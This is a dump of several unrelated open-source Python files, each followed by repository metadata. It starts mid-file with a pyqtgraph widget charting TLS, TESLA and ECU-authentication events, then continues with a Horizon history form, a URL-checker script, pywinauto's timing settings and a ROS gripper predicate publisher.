self.tesla_message_authenticated = [MonitorTags.CP_RETURNED_AUTHENTICATED_SIMPLE_MESSAGE]
self.tesla = self.tesla_time_sync_send + self.tesla_time_sync_rec + self.tesla_setup_send + self.tesla_setup_rec + self.tesla_simple_message_send + self.tesla_simple_message_rec + self.tesla_message_authenticated
# TLS
self.hand_shake_tag_server_send = [MonitorTags.CP_SEND_SERVER_HELLO, MonitorTags.CP_SEND_SERVER_CERTIFICATE, MonitorTags.CP_SEND_SERVER_KEYEXCHANGE, MonitorTags.CP_SEND_CERTIFICATE_REQUEST, MonitorTags.CP_SEND_SERVER_HELLO_DONE, \
MonitorTags.CP_CLIENT_FINISHED_GENERATED_HASH_PRF]
self.hand_shake_tag_server_rec = [MonitorTags.CP_RECEIVE_CLIENT_HELLO, MonitorTags.CP_RECEIVE_CLIENT_CERTIFICATE, MonitorTags.CP_RECEIVE_CLIENT_KEYEXCHANGE, MonitorTags.CP_RECEIVE_CERTIFICATE_VERIFY, MonitorTags.CP_RECEIVED_CHANGE_CIPHER_SPEC, \
MonitorTags.CP_RECEIVE_CLIENT_FINISHED]
self.hand_shake_tag_server_process = [MonitorTags.CP_CLIENT_CERTIFICATE_VALIDATED, MonitorTags.CP_DECRYPTED_CLIENT_KEYEXCHANGE, MonitorTags.CP_DECRYPTED_CERTIFICATE_VERIFY , MonitorTags.CP_GENERATED_MASTER_SECRET_CERT_VERIFY, \
MonitorTags.CP_CLIENT_FINISHED_HASHED_COMPARISON_HASH , MonitorTags.CP_CLIENT_AUTHENTICATED]
self.hand_shake_tag_client_send = [MonitorTags.CP_SEND_CLIENT_HELLO, MonitorTags.CP_SEND_CLIENT_CERTIFICATE , MonitorTags.CP_ENCRYPTED_CLIENT_KEYEXCHANGE , \
MonitorTags.CP_SEND_CIPHER_SPEC , MonitorTags.CP_GENERATED_HASH_FROM_PRF_CLIENT_FINISHED, MonitorTags.CP_GENERATED_HASH_FROM_PRF_SERVER_FINISHED]
self.hand_shake_tag_client_rec = [MonitorTags.CP_RECEIVE_SERVER_HELLO, MonitorTags.CP_RECEIVE_SERVER_CERTIFICATE , MonitorTags.CP_RECEIVE_SERVER_KEYEXCHANGE, \
MonitorTags.CP_RECEIVE_CERTIFICATE_REQUEST, MonitorTags.CP_RECEIVE_SERVER_HELLO_DONE, MonitorTags.CP_RECEIVE_SERVER_FINISHED ]
self.hand_shake_tag_client_process = [MonitorTags.CP_SERVER_HELLO_DONE_VALIDATED_CERT, MonitorTags.CP_ENCRYPTED_CLIENT_KEYEXCHANGE , MonitorTags.CP_GENERATED_MASTERSEC_CLIENT_KEYEXCHANGE , MonitorTags.CP_INIT_SEND_CERTIFICATE_VERIFY, \
MonitorTags.CP_ENCRYPTED_CERTIFICATE_VERIFY, MonitorTags.CP_INIT_CLIENT_FINISHED , MonitorTags.CP_HASHED_CLIENT_FINISHED, MonitorTags.CP_SERVER_FINISHED_HASHED_COMPARISON_HASH , \
MonitorTags.CP_SERVER_FINISHED_GENERATED_HASH_PRF, MonitorTags.CP_INIT_SERVER_FINISHED , MonitorTags.CP_HASHED_SERVER_FINISHED, MonitorTags.CP_SERVER_AUTHENTICATED ]
self.simple_tags_send = [MonitorTags.CP_SESSION_AVAILABLE_SEND_MESSAGE]
self.simple_tags_rec = [ MonitorTags.CP_RECEIVE_SIMPLE_MESSAGE ]
self.tls = self.hand_shake_tag_server_send + self.hand_shake_tag_server_rec + self.hand_shake_tag_server_process + self.hand_shake_tag_client_send + self.hand_shake_tag_client_rec + self.hand_shake_tag_client_process \
+ self.simple_tags_send + self.simple_tags_rec
# authentication
self.sec_mod_tags = [MonitorTags.CP_SEC_INIT_AUTHENTICATION, MonitorTags.CP_SEC_ECNRYPTED_CONFIRMATION_MESSAGE, MonitorTags.CP_SEC_COMPARED_HASH_REG_MSG, \
MonitorTags.CP_SEC_ENCRYPTED_DENY_MESSAGE, MonitorTags.CP_SEC_ENCRYPTED_GRANT_MESSAGE, MonitorTags.CP_SEC_DECRYPTED_REQ_MESSAGE, MonitorTags.CP_SEC_RECEIVE_REG_MESSAGE]
self.authent_tags_send = [MonitorTags.CP_SEC_INIT_AUTHENTICATION, MonitorTags.CP_SEC_ECNRYPTED_CONFIRMATION_MESSAGE, MonitorTags.CP_ECU_SEND_REG_MESSAGE]
self.authent_tags_receive = [MonitorTags.CP_SEC_COMPARED_HASH_REG_MSG, MonitorTags.CP_ECU_VALIDATED_SEC_MOD_CERTIFICATE, MonitorTags.CP_ECU_DECRYPTED_CONF_MESSAGE]
self.author_tags_send = [MonitorTags.CP_SEC_ENCRYPTED_DENY_MESSAGE, MonitorTags.CP_SEC_ENCRYPTED_GRANT_MESSAGE, MonitorTags.CP_ECU_ENCRYPTED_REQ_MESSAGE]
self.author_tags_receive = [MonitorTags.CP_ECU_DECRYPTED_DENY_MESSAGE, MonitorTags.CP_ECU_DECRYPTED_GRANT_MESSAGE, MonitorTags.CP_SEC_DECRYPTED_REQ_MESSAGE]
self.simp_tags_send = [MonitorTags.CP_ECU_ENCRYPTED_SEND_SIMPLE_MESSAGE]
self.simp_tags_receive = [MonitorTags.CP_ECU_DECRYPTED_SIMPLE_MESSAGE]
self.lw_auth = self.sec_mod_tags + self.authent_tags_send + self.authent_tags_receive + self.author_tags_send + self.author_tags_receive + self.simp_tags_send + self.simp_tags_receive
def create_widgets(self, parent):
vbox = QtGui.QVBoxLayout()
self.label = QtGui.QLabel()
self.label.setText("Chainview")
view = pg.GraphicsLayoutWidget(parent)
self.axis = ECUShowAxis(orientation='left')
self.plot = view.addPlot(axisItems={'left': self.axis})
self.plot.setLabel('left', 'ECU ID ')
self.plot.setLabel('bottom', 'Time [sec]')
self.plot.showGrid(x=True, y=True)
vbox.addWidget(self.label)
vbox.addWidget(view)
self.setLayout(vbox)
def save(self):
return self._all_points
def load(self, val_pairs):
self._all_points = val_pairs
spots = []
for val in val_pairs:
x_pos = val[0]
y_pos = val[1]
info = val[2:-2]
arr = np.ndarray(2)
arr[0] = x_pos
arr[1] = y_pos
spots.append({'pos': arr, 'data': info, 'brush':pg.mkBrush(val[-2][0], val[-2][1], val[-2][2], 120), 'symbol': val[-1], 'size': 8})
s2 = pg.ScatterPlotItem(size=10, pen=pg.mkPen('w'), pxMode=True)
s2.addPoints(spots)
self.plot.addItem(s2)
s2.sigClicked.connect(self._clicked)
def _next_security_module_lane(self, id_string):
# determine next
# if same element return coresponding
if id_string in self._taken_lanes:
return self._taken_lanes[id_string]
try:
num = -int(self._get_last_num(id_string))
except:
num = -1
if num in self._taken_lanes.values():
while True:
num += 1
if num in self._taken_lanes.values():
break
self._taken_lanes[id_string] = num
self.axis.lanes_map[num] = id_string
return num
def _next_ecu_lane(self, id_string):
# determine next
# if same element return coresponding
if id_string in self._taken_lanes:
return self._taken_lanes[id_string]
try:
num = int(self._get_last_num(id_string))
except:
num = None
if num in self._taken_lanes.values() or num == None:
if num == None: num = 0
while True:
num += 1
if num not in self._taken_lanes.values():
break
self._taken_lanes[id_string] = num
self.axis.lanes_map[num] = id_string
return num
def update_gui(self, monitor_input_lst):
val_pairs = []
# print("Eventmonitor start %s" % monitor_input_lst)
for monitor_input in monitor_input_lst:
if self._already_there(str(monitor_input)): continue
# get ecu ids
if isinstance(monitor_input, str):
for ecu_id in monitor_input_lst:
if not isinstance(ecu_id, str): continue
if isinstance(ecu_id, UUID): continue
self._next_ecu_lane(ecu_id)
continue
if not isinstance(monitor_input, (list, tuple)): continue
# if self._already_there(monitor_input): continue
# Define mode
if eval(monitor_input[3]) in self.tesla:
self._mode = "TESLA"
if eval(monitor_input[3]) in self.tls:
self._mode = "TLS"
if eval(monitor_input[3]) in self.lw_auth:
self._mode = "LW_AUTH"
# extract information
try: t = monitor_input[0]
except: continue
# assign a lane to it
if eval(monitor_input[3]) in self.sec_mod_tags: # security module
id_val = self._next_security_module_lane(monitor_input[1])
else: # ecu
id_val = self._next_ecu_lane(monitor_input[1])
id_val += 0.00000001
# gather information
fst = [t, id_val, monitor_input[1]]
try: scd = [monitor_input[4], monitor_input[5], monitor_input[6], monitor_input[1], monitor_input[7], monitor_input[2], monitor_input[0]] + [t]
except: continue
# Color
color = (0, 0, 0)
symb = 0
if eval(monitor_input[3]) in self.authent_tags_send + self.hand_shake_tag_client_send + self.tesla_time_sync_send:
color = self.COLOR_ECU_AUTH
symb = 0
if eval(monitor_input[3]) in self.authent_tags_receive + self.hand_shake_tag_client_rec + self.tesla_time_sync_rec:
color = self.COLOR_ECU_AUTH
symb = 1
if eval(monitor_input[3]) in self.author_tags_send + self.hand_shake_tag_server_send + self.tesla_setup_send:
color = self.COLOR_STR_AUTH
symb = 0
if eval(monitor_input[3]) in self.author_tags_receive + self.hand_shake_tag_server_rec + self.tesla_setup_rec:
color = self.COLOR_STR_AUTH
symb = 1
if eval(monitor_input[3]) in self.simp_tags_send + self.simple_tags_send + self.tesla_simple_message_send:
color = self.COLOR_SIMPLE
symb = 0
if eval(monitor_input[3]) in self.simp_tags_receive + self.simple_tags_rec + self.tesla_simple_message_rec:
color = self.COLOR_SIMPLE
symb = 1
if eval(monitor_input[3]) in self.tesla_message_authenticated:
color = self.COLOR_PROCESS_2
symb = 2
# if eval(monitor_input[3]) in self.hand_shake_tag_server_process:
# color = self.COLOR_STR_AUTH
# symb = 2
if color == (0, 0, 0): continue
# value pair
val_pairs.append(fst + scd + [color, symb])
spots = []
try: last_free = val_pairs[0][0]
except: last_free = None
for val in val_pairs:
x_pos = val[0]
y_pos = val[1]
info = val[2:-2]
try: info[2] = info[2].get()
except: pass
# Points at same y positions will be shifted to be distinguishable
res = False
try: already_existing = self._pts_ecu[info[0]][x_pos]
except: already_existing = False
if already_existing:
# x_pos = last_free
# find new value
found = False
while not found:
x_pos += 0.00001
try: already_existing = self._pts_ecu[info[0]][x_pos]
except: already_existing = False
if not already_existing:
found = True
# last_free = x_pos
# print(" Plotting x: %s" % x_pos)
General().add_to_three_dict(self._pts_ecu, info[0], x_pos, True)
arr = np.ndarray(2)
arr[0] = x_pos
arr[1] = y_pos
spots.append({'pos': arr, 'data': info, 'brush':pg.mkBrush(val[-2][0], val[-2][1], val[-2][2], 120), 'symbol': val[-1], 'size': 8})
s2 = pg.ScatterPlotItem(size=10, pen=pg.mkPen('w'), pxMode=True)
s2.addPoints(spots)
self.plot.addItem(s2)
s2.sigClicked.connect(self._clicked)
self._all_points += val_pairs
# self.map_points[str(s2[0])]
# print("Eventmonitor end")
def _get_last_num(self, stri):
num = ""
for el in stri[::-1]:
if isnumeric(el):
num += el
else:
break
return num[::-1]
def _id_to_str(self, msg_id):
if self._mode == "TLS":
if msg_id == can_registration.CAN_TLS_CERTIFICATE:
return "Client Certificate"
if msg_id == can_registration.CAN_TLS_CERTIFICATE_REQUEST:
return "Certificate Request"
if msg_id == can_registration.CAN_TLS_CERTIFICATE_VERIFY:
return "Certificate Verify"
if msg_id == can_registration.CAN_TLS_CHANGE_CIPHER_SPEC:
return "Change Cipher Spec"
if msg_id == can_registration.CAN_TLS_CLIENT_HELLO:
return "ClientHello"
if msg_id == can_registration.CAN_TLS_CLIENT_KEY_EXCHANGE:
return "Client Key Exchange"
if msg_id == can_registration.CAN_TLS_FINISHED:
return "Finished "
if msg_id == can_registration.CAN_TLS_SERVER_CERTIFICATE:
return "Server Certificate "
if msg_id == can_registration.CAN_TLS_SERVER_HELLO:
return "ServerHello "
if msg_id == can_registration.CAN_TLS_SERVER_HELLO_DONE:
return "ServerHelloDone "
if msg_id == can_registration.CAN_TLS_SERVER_KEY_EXCHANGE:
return "ServerKeyExchange "
if self._mode == "LW_AUTH":
if msg_id == can_registration.CAN_ECU_AUTH_ADVERTISE:
return "ECU Advertisement"
if msg_id == can_registration.CAN_ECU_AUTH_CONF_MSG:
return "Confirmation Message"
if msg_id == can_registration.CAN_ECU_AUTH_REG_MSG:
return "Registration Message"
if msg_id == can_registration.CAN_STR_AUTH_DENY_MSG:
return "Deny Message"
if msg_id == can_registration.CAN_STR_AUTH_GRANT_MSG:
return "Grant Message"
if msg_id == can_registration.CAN_STR_AUTH_INIT_MSG_STR:
return "Request Message"
if self._mode == "TESLA":
if msg_id == can_registration.CAN_TESLA_TIME_SYNC:
return "Time Sync"
if msg_id == can_registration.CAN_TESLA_TIME_SYNC_RESPONSE:
return "Time Sync Response"
if msg_id == can_registration.CAN_TESLA_KEY_EXCHANGE:
return "Key Exchange"
return msg_id
def _is_sec_mod(self, ecu):
try:
ecu._SECMODULE
return True
except:
pass
return False
|
mit
| -4,896,457,529,280,774,000
| 41.751012
| 253
| 0.551541
| false
| 3.777996
| false
| false
| false
|
NECCSiPortal/NECCSPortal-dashboard
|
nec_portal/dashboards/project/history/forms.py
|
1
|
2741
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from django.core.urlresolvers import reverse_lazy
from django import shortcuts
from django.utils.translation import ugettext_lazy as _
from horizon import forms
from horizon import messages
class HistoryForm(forms.SelfHandlingForm):
search = forms.CharField(label=_('Keyword'),
required=False,
max_length=255,
help_text=_(
'[1]Regular expression is available.'
'(Ex.)"user_name:demo*" '
'returns all the logs of users whose '
'name beginning with "demo". '
'[2]All columns are searched when no '
'columns are selected. '
'[3]AND/OR/NOT search operators are '
'supported.(Ex.)"user_name:demo '
'AND POST" returns POST logs of '
'user "demo".'))
start = forms.DateField(label=_('From:'),
input_formats=("%Y-%m-%d",))
end = forms.DateField(label=_('To:'),
input_formats=("%Y-%m-%d",))
def __init__(self, *args, **kwargs):
super(HistoryForm, self).__init__(*args, **kwargs)
self.fields['start'].widget.attrs['data-date-format'] = "yyyy-mm-dd"
self.fields['end'].widget.attrs['data-date-format'] = "yyyy-mm-dd"
def clean(self):
cleaned_data = self.cleaned_data
start_date = cleaned_data.get('start', None)
end_date = cleaned_data.get('end', None)
if start_date and end_date and start_date > end_date:
messages.error(self.request,
_('Invalid time period. The end date should be '
'more recent than the start date.'))
return cleaned_data
def handle(self, request, data):
response = shortcuts.redirect(
reverse_lazy("horizon:project:history:index"))
return response
|
apache-2.0
| -1,124,052,965,189,229,300
| 43.209677
| 76
| 0.551988
| false
| 4.478758
| false
| false
| false
|
thefourtheye/elasticsearch-monitoring
|
url_checker.py
|
1
|
2079
|
from master import get_conn
try:
import simplejson as json
except ImportError:
import json
with open("urls.json") as f:
urls_data = json.load(f)
def sort(x):
return (x.get("success", False), x.get("url", ""))
def table(title, l):
temp = """
<table width='100%' border=1 cellpadding=3 cellspacing=0>
<caption>{0}</caption>
<tr><th>Expected</th><th>Actual</th><th>URL</th></tr>
""".format(title)
for item in sorted(l, key=sort):
temp += "<tr><td>" + "</td><td>".join([
str(item["expected"] or ""),
str(item["actual"] or ""),
str(item["url"] or "")
]) + "</td></tr>"
return temp + "</table><br/>"
def url_checker():
results = {
"severity": "INFO",
"title": "URLs Checker",
"body": ""
}
responses = []
for key, value in urls_data.items():
res, _, conn = get_conn(value.get("host"), value)[0]
expected = value.get("expectedHTTPCode", 200)
url = "{0}://{1}{2}".format(
value.get("protocol", "http"),
value.get("host", ""),
value.get("path", "")
)
result = {
"success": True,
"expected": expected,
"url": url
}
if res:
try:
r1 = conn(value.get("path", ""))
r1.read()
result.update({
"success": int(r1.status) == expected,
"actual": r1.status
})
except Exception, ex:
result.update({
"success": False,
"actual": str(ex)
})
else:
result.update({
"success": False,
"actual": "Unable to establish connection to {0}".format(url)
})
responses.append(result)
if any(not r.get("success", False) for r in responses):
results["severity"] = "FATAL"
results["body"] = table("URLs Checker", responses)
return results
|
mit
| -1,274,268,218,179,104,300
| 26.72
| 77
| 0.46176
| false
| 3.930057
| false
| false
| false
|
MagazinnikIvan/pywinauto
|
pywinauto/timings.py
|
1
|
14481
|
# GUI Application automation and testing library
# Copyright (C) 2006-2017 Mark Mc Mahon and Contributors
# https://github.com/pywinauto/pywinauto/graphs/contributors
# http://pywinauto.readthedocs.io/en/latest/credits.html
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of pywinauto nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Timing settings for all of pywinauto
This module has one object that should be used for all timing adjustments
timings.Timings
There are a couple of predefined settings
timings.Timings.Fast()
timings.Timings.Defaults()
timings.Timings.Slow()
The Following are the individual timing settings that can be adjusted:
* window_find_timeout (default 5)
* window_find_retry (default .09)
* app_start_timeout (default 10)
* app_start_retry (default .90)
* cpu_usage_interval (default .5)
* cpu_usage_wait_timeout (default 20)
* exists_timeout (default .5)
* exists_retry (default .3)
* after_click_wait (default .09)
* after_clickinput_wait (default .09)
* after_menu_wait (default .1)
* after_sendkeys_key_wait (default .01)
* after_button_click_wait (default 0)
* before_closeclick_wait (default .1)
* closeclick_retry (default .05)
* closeclick_dialog_close_wait (default 2)
* after_closeclick_wait (default .2)
* after_windowclose_timeout (default 2)
* after_windowclose_retry (default .5)
* after_setfocus_wait (default .06)
* setfocus_timeout (default 2)
* setfocus_retry (default .1)
* after_setcursorpos_wait (default .01)
* sendmessagetimeout_timeout (default .01)
* after_tabselect_wait (default .05)
* after_listviewselect_wait (default .01)
* after_listviewcheck_wait default(.001)
* after_treeviewselect_wait default(.1)
* after_toobarpressbutton_wait default(.01)
* after_updownchange_wait default(.1)
* after_movewindow_wait default(0)
* after_buttoncheck_wait default(0)
* after_comboboxselect_wait default(.001)
* after_listboxselect_wait default(0)
* after_listboxfocuschange_wait default(0)
* after_editsetedittext_wait default(0)
* after_editselect_wait default(.02)
* drag_n_drop_move_mouse_wait default(.1)
* before_drag_wait default(.2)
* before_drop_wait default(.1)
* after_drag_n_drop_wait default(.1)
* scroll_step_wait default(.1)
"""
import time
import operator
from functools import wraps
#=========================================================================
class TimeConfig(object):
"""Central storage and manipulation of timing values"""
__default_timing = {
'window_find_timeout' : 5.,
'window_find_retry' : .09,
'app_start_timeout' : 10.,
'app_start_retry' : .90,
'cpu_usage_interval' : .5,
'cpu_usage_wait_timeout' : 20.,
'exists_timeout' : .5,
'exists_retry' : .3,
'after_click_wait' : .09,
'after_clickinput_wait' : .09,
'after_menu_wait' : .1,
'after_sendkeys_key_wait' : .01,
'after_button_click_wait' : 0,
'before_closeclick_wait' : .1,
'closeclick_retry' : .05,
'closeclick_dialog_close_wait' : 2.,
'after_closeclick_wait' : .2,
'after_windowclose_timeout': 2,
'after_windowclose_retry': .5,
'after_setfocus_wait': .06,
'setfocus_timeout': 2,
'setfocus_retry': .1,
'after_setcursorpos_wait' : .01,
'sendmessagetimeout_timeout' : .01,
'after_tabselect_wait': .05,
'after_listviewselect_wait': .01,
'after_listviewcheck_wait': .001,
'after_treeviewselect_wait': .1,
'after_toobarpressbutton_wait': .01,
'after_updownchange_wait': .1,
'after_movewindow_wait': 0,
'after_buttoncheck_wait': 0,
'after_comboboxselect_wait': 0.001,
'after_listboxselect_wait': 0,
'after_listboxfocuschange_wait': 0,
'after_editsetedittext_wait': 0,
'after_editselect_wait': 0.02,
'drag_n_drop_move_mouse_wait': 0.1,
'before_drag_wait': 0.2,
'before_drop_wait': 0.1,
'after_drag_n_drop_wait': 0.1,
'scroll_step_wait': 0.1,
}
assert(__default_timing['window_find_timeout'] >=\
__default_timing['window_find_retry'] * 2)
_timings = __default_timing.copy()
_cur_speed = 1
def __getattribute__(self, attr):
"""Get the value for a particular timing"""
if attr in ['__dict__', '__members__', '__methods__', '__class__']:
return object.__getattribute__(self, attr)
if attr in dir(TimeConfig):
return object.__getattribute__(self, attr)
if attr in self.__default_timing:
return self._timings[attr]
else:
raise AttributeError("Unknown timing setting: {0}".format(attr))
def __setattr__(self, attr, value):
"""Set a particular timing"""
if attr == '_timings':
object.__setattr__(self, attr, value)
elif attr in self.__default_timing:
self._timings[attr] = value
else:
raise AttributeError("Unknown timing setting: {0}".format(attr))
def Fast(self):
"""Set fast timing values
Currently this changes the timing in the following ways:
timeouts = 1 second
waits = 0 seconds
retries = .001 seconds (minimum!)
(if existing times are faster then keep existing times)
"""
for setting in self.__default_timing:
# set timeouts to the min of the current speed or 1 second
if "_timeout" in setting:
self._timings[setting] = \
min(1, self._timings[setting])
if "_wait" in setting:
self._timings[setting] = self._timings[setting] / 2
elif setting.endswith("_retry"):
self._timings[setting] = 0.001
#self._timings['app_start_timeout'] = .5
def Slow(self):
"""Set slow timing values
Currently this changes the timing in the following ways:
timeouts = default timeouts * 10
waits = default waits * 3
retries = default retries * 3
(if existing times are slower then keep existing times)
"""
for setting in self.__default_timing:
if "_timeout" in setting:
self._timings[setting] = max(
self.__default_timing[setting] * 10,
self._timings[setting])
if "_wait" in setting:
self._timings[setting] = max(
self.__default_timing[setting] * 3,
self._timings[setting])
elif setting.endswith("_retry"):
self._timings[setting] = max(
self.__default_timing[setting] * 3,
self._timings[setting])
if self._timings[setting] < .2:
self._timings[setting]= .2
def Defaults(self):
"""Set all timings to the default time"""
self._timings = self.__default_timing.copy()
Timings = TimeConfig()
#=========================================================================
class TimeoutError(RuntimeError):
pass
#=========================================================================
def always_wait_until(
timeout,
retry_interval,
value = True,
op = operator.eq):
"""Decorator to call wait_until(...) every time for a decorated function/method"""
def wait_until_decorator(func):
"""Callable object that must be returned by the @always_wait_until decorator"""
@wraps(func)
def wrapper(*args):
"""pre-callback, target function call and post-callback"""
return wait_until(timeout, retry_interval,
func, value, op, *args)
return wrapper
return wait_until_decorator
#=========================================================================
def wait_until(
timeout,
retry_interval,
func,
value = True,
op = operator.eq,
*args):
r"""Wait until ``op(function(*args), value)`` is True or until timeout expires
* **timeout** how long the function will try the function
* **retry_interval** how long to wait between retries
* **func** the function that will be executed
* **value** the value to be compared against (defaults to True)
* **op** the comparison function (defaults to equality)\
* **args** optional arguments to be passed to func when called
Returns the return value of the function
If the operation times out then the return value of the the function
is in the 'function_value' attribute of the raised exception.
e.g. ::
try:
# wait a maximum of 10.5 seconds for the
# the objects item_count() method to return 10
# in increments of .5 of a second
wait_until(10.5, .5, self.item_count, 10)
except TimeoutError as e:
print("timed out")
"""
start = time.time()
func_val = func(*args)
# while the function hasn't returned what we are waiting for
while not op(func_val, value):
# find out how much of the time is left
time_left = timeout - ( time.time() - start)
# if we have to wait some more
if time_left > 0:
# wait either the retry_interval or else the amount of
# time until the timeout expires (whichever is less)
time.sleep(min(retry_interval, time_left))
func_val = func(*args)
else:
err = TimeoutError("timed out")
err.function_value = func_val
raise err
return func_val
# Non PEP-8 alias
WaitUntil = wait_until
#=========================================================================
def always_wait_until_passes(
timeout,
retry_interval,
exceptions = (Exception)):
"""Decorator to call wait_until_passes(...) every time for a decorated function/method"""
def wait_until_passes_decorator(func):
"""Callable object that must be returned by the @always_wait_until_passes decorator"""
@wraps(func)
def wrapper(*args):
"""pre-callback, target function call and post-callback"""
return wait_until_passes(timeout, retry_interval,
func, exceptions, *args)
return wrapper
return wait_until_passes_decorator
#=========================================================================
def wait_until_passes(
timeout,
retry_interval,
func,
exceptions = (Exception),
*args):
"""Wait until ``func(*args)`` does not raise one of the exceptions in exceptions
* **timeout** how long the function will try the function
* **retry_interval** how long to wait between retries
* **func** the function that will be executed
* **exceptions** list of exceptions to test against (default: Exception)
* **args** optional arguments to be passed to func when called
Returns the return value of the function
If the operation times out then the original exception raised is in
the 'original_exception' attribute of the raised exception.
e.g. ::
try:
# wait a maximum of 10.5 seconds for the
# window to be found in increments of .5 of a second.
# P.int a message and re-raise the original exception if never found.
wait_until_passes(10.5, .5, self.Exists, (ElementNotFoundError))
except TimeoutError as e:
print("timed out")
raise e.
"""
start = time.time()
# keep trying until the timeout is passed
while True:
try:
# Call the function with any arguments
func_val = func(*args)
# if no exception is raised then we are finished
break
# An exception was raised - so wait and try again
except exceptions as e:
# find out how much of the time is left
time_left = timeout - ( time.time() - start)
# if we have to wait some more
if time_left > 0:
# wait either the retry_interval or else the amount of
# time until the timeout expires (whichever is less)
time.sleep(min(retry_interval, time_left))
else:
# Raise a TimeoutError - and put the original exception
# inside it
err = TimeoutError()
err.original_exception = e
raise err
# return the function value
return func_val
# Non PEP-8 alias
WaitUntilPasses = wait_until_passes
|
bsd-3-clause
| -3,935,834,530,646,250,000
| 31.676744
| 94
| 0.585181
| false
| 4.151663
| false
| false
| false
|
cpaxton/predicator
|
predicator_robotiq/src/predicator_robotiq/s_model.py
|
1
|
5702
|
# predicator (c) 2014-2016, Chris Paxton
#
# based on some code taken from Robotiq's s_model_control package:
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Robotiq, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Robotiq, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Copyright (c) 2012, Robotiq, Inc.
# Revision $Id$
import rospy
from robotiq_s_model_control.msg import SModel_robot_input as inputMsg
from predicator_msgs.msg import *
class SModelPredicator:
def __init__(self,publish_predicates=True,start_subscriber=True,gripper_name='s_model'):
self.valid_predicates = ValidPredicates(assignments=[gripper_name],predicates=['gripper_open','gripper_closed','gripper_moving',
'gripper_basic_mode','gripper_pinch_mode','gripper_wide_mode','gripper_scissor_mode','gripper_activated',
'finger_a_contact','finger_b_contact','finger_c_contact','any_finger_contact'])
self.predicate_msg = PredicateList()
self.gripper_name = gripper_name
self.gripper_mode = ''
self.activated = False
self.contact = False
self.closed = False
self.moving = False
if publish_predicates:
# create predicator things
self.pub = rospy.Publisher("predicator/input",PredicateList,queue_size=1000)
self.vpub = rospy.Publisher("predicator/valid_predicates",PredicateList,queue_size=1000)
if start_subscriber:
self.sub = rospy.Subscriber("SModelRobotInput",inputMsg,self.callback)
self.name = rospy.get_name()
def callback(self, msg):
self.handle(msg)
def handle(self,status):
self.predicate_msg = PredicateList()
self.predicate_msg.pheader.source = self.name
if(status.gACT == 0):
# gripper reset
pass
if(status.gACT == 1):
self.addPredicate('gripper_activated')
self.activated = False
else:
self.activated = True
if(status.gMOD == 0):
self.addPredicate('gripper_basic_mode')
self.gripper_mode = 'basic'
elif(status.gMOD == 1):
self.addPredicate('gripper_pinch_mode')
self.gripper_mode = 'pinch'
elif(status.gMOD == 2):
self.addPredicate('gripper_wide_mode')
self.gripper_mode = 'wide'
elif(status.gMOD == 3):
self.addPredicate('gripper_scissor_mode')
self.gripper_mode = 'scissor'
if ((status.gGTO == 1) # going to position (GOTO command)
or (status.gIMC == 2) # mode change in progress
or (status.gSTA == 0) # in motion towards position
):
self.addPredicate('gripper_moving')
self.moving = True
else:
self.moving = False
contact = False
if (status.gDTA == 1 or status.gDTA == 2):
self.addPredicate('finger_a_contact')
contact = True
if (status.gDTB == 1 or status.gDTB == 2):
self.addPredicate('finger_b_contact')
contact = True
if (status.gDTC == 1 or status.gDTC == 2):
self.addPredicate('finger_c_contact')
contact = True
self.contact = contact
